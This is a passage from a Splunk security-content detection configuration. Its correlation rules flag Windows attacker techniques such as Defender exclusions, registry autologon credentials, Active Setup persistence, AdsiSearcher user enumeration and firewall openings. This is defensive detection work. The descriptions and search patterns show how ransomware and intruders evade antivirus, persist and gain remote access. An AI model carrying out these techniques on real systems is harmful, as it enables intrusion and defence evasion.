predetermined threshold of correlated analytics is reached within the specified time frame. This threshold can be customized to suit the needs and risk appetite of the organization. action.notable.param.rule_title = RBA: Active Directory Privilege Escalation Identified action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime sum(All_Risk.calculated_risk_score) as risk_score, count(All_Risk.calculated_risk_score) as risk_event_count, values(All_Risk.annotations.mitre_attack.mitre_tactic_id) as annotations.mitre_attack.mitre_tactic_id, dc(All_Risk.annotations.mitre_attack.mitre_tactic_id) as mitre_tactic_id_count, values(All_Risk.annotations.mitre_attack.mitre_technique_id) as annotations.mitre_attack.mitre_technique_id, dc(All_Risk.annotations.mitre_attack.mitre_technique_id) as mitre_technique_id_count, values(All_Risk.tag) as tag, values(source) as source, dc(source) as source_count from datamodel=Risk.All_Risk where All_Risk.analyticstories="Active Directory Privilege Escalation" All_Risk.risk_object_type="system" by All_Risk.risk_object All_Risk.risk_object_type All_Risk.annotations.mitre_attack.mitre_tactic | `drop_dm_object_name(All_Risk)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | where source_count >= 4 | `active_directory_privilege_escalation_identified_filter` [ESCU - Active Setup Registry Autostart - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect a suspicious modification of the active setup registry for persistence and privilege escalation. This technique was seen in several malware (poisonIvy), adware and APT to gain persistence to the compromised machine upon boot up. This TTP is a good indicator to further check the process id that do the modification since modification of this registry is not commonly done. check the legitimacy of the file and process involve in this rules to check if it is a valid setup installer that creating or modifying this registry. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.014", "T1547"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect a suspicious modification of the active setup registry for persistence and privilege escalation. This technique was seen in several malware (poisonIvy), adware and APT to gain persistence to the compromised machine upon boot up. This TTP is a good indicator to further check the process id that do the modification since modification of this registry is not commonly done. check the legitimacy of the file and process involve in this rules to check if it is a valid setup installer that creating or modifying this registry. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = Active setup installer may add or modify this registry. action.escu.creation_date = 2023-04-27 action.escu.modification_date = 2023-04-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Active Setup Registry Autostart - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Data Destruction", "Windows Privilege Escalation", "Hermetic Wiper", "Windows Persistence Techniques"] action.risk = 1 action.risk.param._risk_message = modified/added/deleted registry entry $registry_path$ in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Active Setup Registry Autostart - Rule action.correlationsearch.annotations = {"analytic_story": ["Data Destruction", "Windows Privilege Escalation", "Hermetic Wiper", "Windows Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.014", "T1547"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic is to detect a suspicious modification of the active setup registry for persistence and privilege escalation. This technique was seen in several malware (poisonIvy), adware and APT to gain persistence to the compromised machine upon boot up. This TTP is a good indicator to further check the process id that do the modification since modification of this registry is not commonly done. check the legitimacy of the file and process involve in this rules to check if it is a valid setup installer that creating or modifying this registry. action.notable.param.rule_title = Active Setup Registry Autostart action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_value_name= "StubPath" Registry.registry_path = "*\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components*") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid Registry.dest Registry.user | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `active_setup_registry_autostart_filter` [ESCU - Add DefaultUser And Password In Registry - Rule] action.escu = 0 action.escu.enabled = 1 description = this search is to detect a suspicious registry modification to implement auto admin logon to a host. This technique was seen in BlackMatter ransomware to automatically logon to the compromise host after triggering a safemode boot to continue encrypting the whole network. This behavior is not a common practice and really a suspicious TTP or alert need to be consider if found within then network premise. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1552.002", "T1552"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = this search is to detect a suspicious registry modification to implement auto admin logon to a host. This technique was seen in BlackMatter ransomware to automatically logon to the compromise host after triggering a safemode boot to continue encrypting the whole network. This behavior is not a common practice and really a suspicious TTP or alert need to be consider if found within then network premise. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = unknown action.escu.creation_date = 2023-03-29 action.escu.modification_date = 2023-03-29 action.escu.confidence = high action.escu.full_search_name = ESCU - Add DefaultUser And Password In Registry - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["BlackMatter Ransomware"] action.risk = 1 action.risk.param._risk_message = modified registry key $registry_key_name$ with registry value $registry_value_name$ to prepare autoadminlogon action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Add DefaultUser And Password In Registry - Rule action.correlationsearch.annotations = {"analytic_story": ["BlackMatter Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1552.002", "T1552"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= "*SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon*" AND Registry.registry_value_name= DefaultPassword OR Registry.registry_value_name= DefaultUserName) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.dest Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `add_defaultuser_and_password_in_registry_filter` [ESCU - Add or Set Windows Defender Exclusion - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic will identify a suspicious process command-line related to Windows Defender exclusion feature. This command is abused by adversaries, malware authors and red teams to bypass Windows Defender Antivirus products by excluding folder path, file path, process and extensions. From its real time or schedule scan to execute their malicious code. This is a good indicator for defense evasion and to look further for events after this behavior. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic will identify a suspicious process command-line related to Windows Defender exclusion feature. This command is abused by adversaries, malware authors and red teams to bypass Windows Defender Antivirus products by excluding folder path, file path, process and extensions. From its real time or schedule scan to execute their malicious code. This is a good indicator for defense evasion and to look further for events after this behavior. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Admin or user may choose to use this windows features. Filter as needed. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Add or Set Windows Defender Exclusion - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["CISA AA22-320A", "AgentTesla", "Remcos", "Windows Defense Evasion Tactics", "Data Destruction", "WhisperGate"] action.risk = 1 action.risk.param._risk_message = exclusion command $process$ executed on $dest$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 64}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Add or Set Windows Defender Exclusion - Rule action.correlationsearch.annotations = {"analytic_story": ["CISA AA22-320A", "AgentTesla", "Remcos", "Windows Defense Evasion Tactics", "Data Destruction", "WhisperGate"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic will identify a suspicious process command-line related to Windows Defender exclusion feature. This command is abused by adversaries, malware authors and red teams to bypass Windows Defender Antivirus products by excluding folder path, file path, process and extensions. From its real time or schedule scan to execute their malicious code. This is a good indicator for defense evasion and to look further for events after this behavior. action.notable.param.rule_title = Add or Set Windows Defender Exclusion action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process = "*Add-MpPreference *" OR Processes.process = "*Set-MpPreference *") AND Processes.process="*-exclusion*" by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `add_or_set_windows_defender_exclusion_filter` [ESCU - AdsiSearcher Account Discovery - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the `[Adsisearcher]` type accelerator being used to query Active Directory for domain groups. Red Teams and adversaries may leverage `[Adsisearcher]` to enumerate domain users for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the `[Adsisearcher]` type accelerator being used to query Active Directory for domain groups. Red Teams and adversaries may leverage `[Adsisearcher]` to enumerate domain users for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The following Hunting analytic requires PowerShell operational logs to be imported. Modify the powershell macro as needed to match the sourcetype or add index. This analytic is specific to 4104, or PowerShell Script Block Logging. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - AdsiSearcher Account Discovery - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Industroyer2", "Active Directory Discovery", "CISA AA23-347A", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = Powershell process having commandline "AdsiSearcher" used for user enumeration on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AdsiSearcher Account Discovery - Rule action.correlationsearch.annotations = {"analytic_story": ["Industroyer2", "Active Directory Discovery", "CISA AA23-347A", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the `[Adsisearcher]` type accelerator being used to query Active Directory for domain groups. Red Teams and adversaries may leverage `[Adsisearcher]` to enumerate domain users for situational awareness and Active Directory Discovery. action.notable.param.rule_title = AdsiSearcher Account Discovery action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText = "*[adsisearcher]*" ScriptBlockText = "*objectcategory=user*" ScriptBlockText = "*.findAll()*" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode Computer ScriptBlockText UserID | rename Computer as dest, UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `adsisearcher_account_discovery_filter` [ESCU - Allow File And Printing Sharing In Firewall - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a suspicious modification of firewall to allow file and printer sharing. This technique was seen in ransomware to be able to discover more machine connected to the compromised host to encrypt more files action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.007", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is to detect a suspicious modification of firewall to allow file and printer sharing. This technique was seen in ransomware to be able to discover more machine connected to the compromised host to encrypt more files action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = network admin may modify this firewall feature that may cause this rule to be triggered. action.escu.creation_date = 2023-12-15 action.escu.modification_date = 2023-12-15 action.escu.confidence = high action.escu.full_search_name = ESCU - Allow File And Printing Sharing In Firewall - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ransomware", "BlackByte Ransomware"] action.risk = 1 action.risk.param._risk_message = A suspicious modification of firewall to allow file and printer sharing detected on host - $dest$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Allow File And Printing Sharing In Firewall - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "BlackByte Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.007", "T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect a suspicious modification of firewall to allow file and printer sharing. This technique was seen in ransomware to be able to discover more machine connected to the compromised host to encrypt more files action.notable.param.rule_title = Allow File And Printing Sharing In Firewall action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_netsh` Processes.process= "*firewall*" Processes.process= "*group=\"File and Printer Sharing\"*" Processes.process="*enable=Yes*" by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.parent_process_name Processes.original_file_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `allow_file_and_printing_sharing_in_firewall_filter` [ESCU - Allow Inbound Traffic By Firewall Rule Registry - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects a potential suspicious modification of firewall rule registry allowing inbound traffic in specific port with public profile. This technique was identified when an adversary wants to grant remote access to a machine by allowing the traffic in a firewall rule. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021.001", "T1021"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects a potential suspicious modification of firewall rule registry allowing inbound traffic in specific port with public profile. This technique was identified when an adversary wants to grant remote access to a machine by allowing the traffic in a firewall rule. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = network admin may add/remove/modify public inbound firewall rule that may cause this rule to be triggered. action.escu.creation_date = 2023-03-29 action.escu.modification_date = 2023-03-29 action.escu.confidence = high action.escu.full_search_name = ESCU - Allow Inbound Traffic By Firewall Rule Registry - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Prohibited Traffic Allowed or Protocol Mismatch", "Windows Registry Abuse", "Azorult", "NjRAT", "PlugX"] action.risk = 1 action.risk.param._risk_message = Suspicious firewall allow rule modifications were detected via the registry on endpoint $dest$ by user $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Allow Inbound Traffic By Firewall Rule Registry - Rule action.correlationsearch.annotations = {"analytic_story": ["Prohibited Traffic Allowed or Protocol Mismatch", "Windows Registry Abuse", "Azorult", "NjRAT", "PlugX"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021.001", "T1021"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects a potential suspicious modification of firewall rule registry allowing inbound traffic in specific port with public profile. This technique was identified when an adversary wants to grant remote access to a machine by allowing the traffic in a firewall rule. action.notable.param.rule_title = Allow Inbound Traffic By Firewall Rule Registry action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= "*\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\*" Registry.registry_value_data = "*|Action=Allow|*" Registry.registry_value_data = "*|Dir=In|*" Registry.registry_value_data = "*|LPort=*") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid Registry.dest Registry.user | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `allow_inbound_traffic_by_firewall_rule_registry_filter` [ESCU - Allow Inbound Traffic In Firewall Rule - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies suspicious PowerShell command to allow inbound traffic inbound to a specific local port within the public profile. This technique was seen in some attacker want to have a remote access to a machine by allowing the traffic in firewall rule. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021.001", "T1021"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies suspicious PowerShell command to allow inbound traffic inbound to a specific local port within the public profile. This technique was seen in some attacker want to have a remote access to a machine by allowing the traffic in firewall rule. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the powershell logs from your endpoints. make sure you enable needed registry to monitor this event. action.escu.known_false_positives = administrator may allow inbound traffic in certain network or machine. action.escu.creation_date = 2021-05-19 action.escu.modification_date = 2021-05-19 action.escu.confidence = high action.escu.full_search_name = ESCU - Allow Inbound Traffic In Firewall Rule - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Prohibited Traffic Allowed or Protocol Mismatch"] action.risk = 1 action.risk.param._risk_message = Suspicious firewall modification detected on endpoint $ComputerName$ by user $user$. action.risk.param._risk = [{"risk_object_field": "User", "risk_object_type": "user", "risk_score": 3}, {"risk_object_field": "ComputerName", "risk_object_type": "system", "risk_score": 3}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Allow Inbound Traffic In Firewall Rule - Rule action.correlationsearch.annotations = {"analytic_story": ["Prohibited Traffic Allowed or Protocol Mismatch"], "cis20": ["CIS 10"], "confidence": 30, "impact": 10, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021.001", "T1021"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies suspicious PowerShell command to allow inbound traffic inbound to a specific local port within the public profile. This technique was seen in some attacker want to have a remote access to a machine by allowing the traffic in firewall rule. action.notable.param.rule_title = Allow Inbound Traffic In Firewall Rule action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 Message = "*firewall*" Message = "*Inbound*" Message = "*Allow*" Message = "*-LocalPort*" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode Message ComputerName User | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `allow_inbound_traffic_in_firewall_rule_filter` [ESCU - Allow Network Discovery In Firewall - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a suspicious modification to the firewall to allow network discovery on a machine. This technique was seen in couple of ransomware (revil, reddot) to discover other machine connected to the compromised host to encrypt more files. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.007", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is to detect a suspicious modification to the firewall to allow network discovery on a machine. This technique was seen in couple of ransomware (revil, reddot) to discover other machine connected to the compromised host to encrypt more files. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = network admin may modify this firewall feature that may cause this rule to be triggered. action.escu.creation_date = 2021-06-23 action.escu.modification_date = 2021-06-23 action.escu.confidence = high action.escu.full_search_name = ESCU - Allow Network Discovery In Firewall - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ransomware", "Revil Ransomware", "BlackByte Ransomware", "NjRAT"] action.risk = 1 action.risk.param._risk_message = Suspicious modification to the firewall to allow network discovery detected on host - $dest$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Allow Network Discovery In Firewall - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "Revil Ransomware", "BlackByte Ransomware", "NjRAT"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.007", "T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect a suspicious modification to the firewall to allow network discovery on a machine. This technique was seen in couple of ransomware (revil, reddot) to discover other machine connected to the compromised host to encrypt more files. action.notable.param.rule_title = Allow Network Discovery In Firewall action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_netsh` Processes.process= "*firewall*" Processes.process= "*group=\"Network Discovery\"*" Processes.process="*enable*" Processes.process="*Yes*" by Processes.dest Processes.user Processes.parent_process Processes.original_file_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `allow_network_discovery_in_firewall_filter` [ESCU - Allow Operation with Consent Admin - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies a potential privilege escalation attempt to perform malicious task. This registry modification is designed to allow the `Consent Admin` to perform an operation that requires elevation without consent or credentials. We also found this in some attacker to gain privilege escalation to the compromise machine. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic identifies a potential privilege escalation attempt to perform malicious task. This registry modification is designed to allow the `Consent Admin` to perform an operation that requires elevation without consent or credentials. We also found this in some attacker to gain privilege escalation to the compromise machine. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = unknown action.escu.creation_date = 2023-03-29 action.escu.modification_date = 2023-03-29 action.escu.confidence = high action.escu.full_search_name = ESCU - Allow Operation with Consent Admin - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ransomware", "Windows Registry Abuse", "Azorult"] action.risk = 1 action.risk.param._risk_message = Suspicious registry modification was performed on endpoint $dest$ by user $user$. This behavior is indicative of privilege escalation. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Allow Operation with Consent Admin - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "Windows Registry Abuse", "Azorult"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies a potential privilege escalation attempt to perform malicious task. This registry modification is designed to allow the 